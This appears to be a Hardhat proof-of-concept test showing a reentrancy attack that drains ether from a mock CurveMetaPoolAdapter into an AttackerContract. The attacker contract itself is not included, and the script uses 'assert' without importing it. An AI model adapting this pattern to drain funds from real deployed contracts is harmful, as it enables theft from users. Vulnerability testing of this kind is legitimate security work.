Untitled

// Hardhat test script to demonstrate the exploit of the vulnerability in CurveMetaPoolAdapter

const { ethers } = require("hardhat");

describe("Reentrancy Attack", function () {
  let curveMetaPoolAdapter;
  let attackerContract;
  let user;

  before(async function () {
    // Deploy a mock version of CurveMetaPoolAdapter
    const CurveMetaPoolAdapterMock = await ethers.getContractFactory("CurveMetaPoolAdapterMock");
    curveMetaPoolAdapter = await CurveMetaPoolAdapterMock.deploy();

    // Deploy AttackerContract
    const AttackerContract = await ethers.getContractFactory("AttackerContract");
    attackerContract = await AttackerContract.deploy(curveMetaPoolAdapter.address);

    // Get the user account
    [user] = await ethers.getSigners();
  });

  it("should exploit reentrancy vulnerability", async function () {
    // Set up the attacker's address to receive stolen funds
    const attackerAddress = await attackerContract.address;

    // Send some funds to the CurveMetaPoolAdapter contract
    const initialFunds = ethers.utils.parseEther("10");
    await user.sendTransaction({ to: curveMetaPoolAdapter.address, value: initialFunds });

    // Call the attack function of the AttackerContract, stealing funds during re-entry
    await attackerContract.attack(curveMetaPoolAdapter.address, attackerAddress, initialFunds);

    // Check if funds have been stolen from the CurveMetaPoolAdapter contract
    const adapterBalance = await ethers.provider.getBalance(curveMetaPoolAdapter.address);
    assert(adapterBalance.eq(0), "Adapter balance should be drained");

    // Check if funds have been stolen by the attacker
    const attackerBalance = await ethers.provider.getBalance(attackerAddress);
    assert(attackerBalance.gt(0), "Attacker should have stolen funds");
  });
});